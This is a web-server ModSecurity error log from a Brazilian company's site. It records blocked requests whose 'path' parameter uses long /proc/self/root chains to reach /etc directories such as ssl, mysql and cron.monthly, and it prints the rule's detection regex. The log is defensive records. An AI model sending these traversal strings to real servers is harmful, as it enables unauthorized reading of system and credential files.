[Mon Mar 16 11:11:12.735291 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.241.46:51806] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPgJqj1wV0Si-OkefhzwAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:11:16.230291 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.243.203:49092] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPhJqj1wV0Si-Okefh0wAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:11:18.227156 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:46942] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPhtSswJuvopo3lOhW1AAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:11:25.789270 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:41962] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPjbysWC90G-1nBrA7gQAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:11:26.358511 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.241.46:43348] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPjo6lpbStxTqkSktkfgAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:11:48.622333 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.243.203:57684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPpP9ocpUE4ed4uDzktwAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:12:10.392045 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.243.203:36240] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPuhXjF1vJNtV6CWruywAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:12:18.295145 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.243.203:49804] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPwnjZBu2q05ozVU9NJgAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:12:19.690897 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.243.203:49814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPw3bQATo66fKoS7xFYQAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:12:26.576421 2026] [:error] [pid 11972:tid 140411658000128] [client 74.7.243.203:40372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPypqj1wV0Si-OkefiDAAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:12:32.087094 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.241.46:43358] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgP0HbQATo66fKoS7xFbgAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:12:33.448904 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:40384] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgP0XjZBu2q05ozVU9NLQAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:12:39.229366 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.243.203:54180] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgP1wlT9VtDQc7bgUykhQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:13:35.941238 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.243.203:60996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQDwlT9VtDQc7bgUykyAAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:13:36.326119 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.244.31:52384] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgQELABkC4fWIHEf8HijgAAAEI"]
[Mon Mar 16 11:13:37.232326 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.243.203:58854] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQEZqj1wV0Si-OkefikAAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:13:37.671204 2026] [:error] [pid 11972:tid 140411574073088] [client 74.7.241.46:37700] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQEZqj1wV0Si-OkefikgAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:13:38.971755 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:43974] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQErABkC4fWIHEf8HikQAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:13:50.728192 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.241.46:43986] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQHrABkC4fWIHEf8HinAAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:13:56.378524 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.243.203:58856] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQJNSswJuvopo3lOhW7wAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:14:00.592904 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.241.46:40780] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQKJqj1wV0Si-OkefirwAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:14:04.127497 2026] [:error] [pid 10709:tid 140411548894976] [client 74.7.241.46:32796] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQLBXjF1vJNtV6CWru0QAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:14:07.669651 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.241.46:32802] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQL46lpbStxTqkSktkjAAAAkg"], referer: 